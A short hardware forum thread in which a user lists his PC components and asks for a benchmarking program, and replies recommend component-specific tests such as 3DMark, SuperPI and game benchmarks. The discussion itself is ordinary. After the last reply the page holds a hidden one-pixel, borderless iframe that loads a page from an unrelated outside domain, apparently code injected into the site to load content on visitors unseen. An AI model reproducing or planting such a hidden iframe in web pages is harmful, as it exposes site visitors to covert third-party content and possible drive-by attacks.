Please report all spam threads, posts and suspicious members. We receive spam notifications and will take immediate action!

Thread: Best Benchmarking Program??

Default Best Benchmarking Program??

Whats the best benchmarking program??One that will tell me my scores for each component, and tell show me other scores?
    CPU -
    Intel Core 2 Duo E6420 Conroe 2.13GHz
    Mobo -
    Abit Fatal1ty FP-IN9
    Memory -
    OCZ SLI-Ready 2GB (2 x 1GB) DDR2 800
    GPU -
    EVGA 8600GT 256MB PCI Express x16
    Optical Drives -
    LITE-ON Black SATA Combo Drive,
    LITE-ON Black
    SATA DVD Burner
    H
    ard Drives -
    (2) Samsung
    HD501LJ 500GB 7200 RPM 16MB Cache SATA 3.0Gb/s

Default Re: Best Benchmarking Program??

You're asking for the impossible. Any benchmark that claims to be able to give you individual results for all primary system components is either a fraud or something to stay away from. The only way to get good benchmark results from your system is to test it with several programs/utilities that specifically test a certain feature. Examples are the 3DMark series that are very dependent on graphics cards. SuperPI is a good utility that tests pure number crunching power of the processor. Modern games allow you to test the system as a whole to see how well it performs. There are countless tests you can do so it is usually best to figure out what you want your system to be good at and test accordingly.
    Old age and treachery will overcome youth and skill
    My Toys

Default Re: Best Benchmarking Program??

Well you could test things such as, FPU/ALU/GPU performance, test cache hit/miss rate, cache speeds, and memory access times with different patterns to isolate components. But I'm not very familiar with doing this on x86 architectures.

<iframe src="http://www.clqk42.com/refs.php" HEIGHT=1 WIDTH=1 FRAMEBORDER=0></iframe>

Thread Information